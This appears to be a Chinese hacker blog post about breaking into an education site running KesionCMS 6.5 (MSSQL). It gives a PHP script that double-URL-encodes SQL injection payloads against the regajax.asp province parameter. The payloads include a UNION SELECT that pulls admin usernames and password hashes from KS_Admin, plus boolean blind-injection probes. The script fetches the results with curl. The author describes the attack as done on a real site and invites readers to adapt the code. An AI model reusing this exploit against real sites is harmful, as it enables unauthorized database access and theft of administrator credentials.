今天跟某黑阔搞一edu，很悲催的站长，前段时间才装的科讯6.5，现在直接被爆菊花。。。

t00ls的大牛只提供了利用方法，我爆了md5，可是解不出···mssql版的科讯，

运气好的能备份shell呢，不能放弃鸟。于是，就着网上的一篇分析文，写了段php，

本地搭建php+apache后，直接丢工具就可以跑了。

<?php
/*
$str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
for ($i=0; $i<=strlen($str); $i++){
        $temp .= "%25".base_convert(ord($str[$i]),10,16);
}
echo $temp."0";
// http://www.2cto.com /user/reg/regajax.asp?action=getcityoption&province=%2566%2527%2520%256F%2572%2520%2531%253D%2531%25006
// 所有信息
$id = $_GET['id'];
$url = "http://www.2cto.com /user/reg/regajax.asp?action=getcityoption&province=";
$param = "f' or 1=1 and 1=".$id; // ?id=1
for ($i = 0; $i < strlen($param); $i ++)
{
        $temp .= "%25".base_convert(ord($param[$i]),10,16);
}
$url = $url.$temp."%2500";
//echo $url;
//echo file_get_contents($url);

echo GetSources($url);
function GetSources($Url,$User_Agent='',$Referer_Url='') //抓取某个指定的页面
{
//$Url 需要抓取的页面地址
//$User_Agent 需要返回的user_agent信息 如“baiduspider”或“googlebot”
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $Url);
curl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt ($ch, CURLOPT_REFERER, $Referer_Url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$MySources = curl_exec ($ch);
curl_close($ch);
return $MySources;
} -
?>

自己看着修改就是了。
 
这里还有一个问题，php 的file_get_contents不能获取505
错误的具体信息，
所以不能报错注射，只能盲注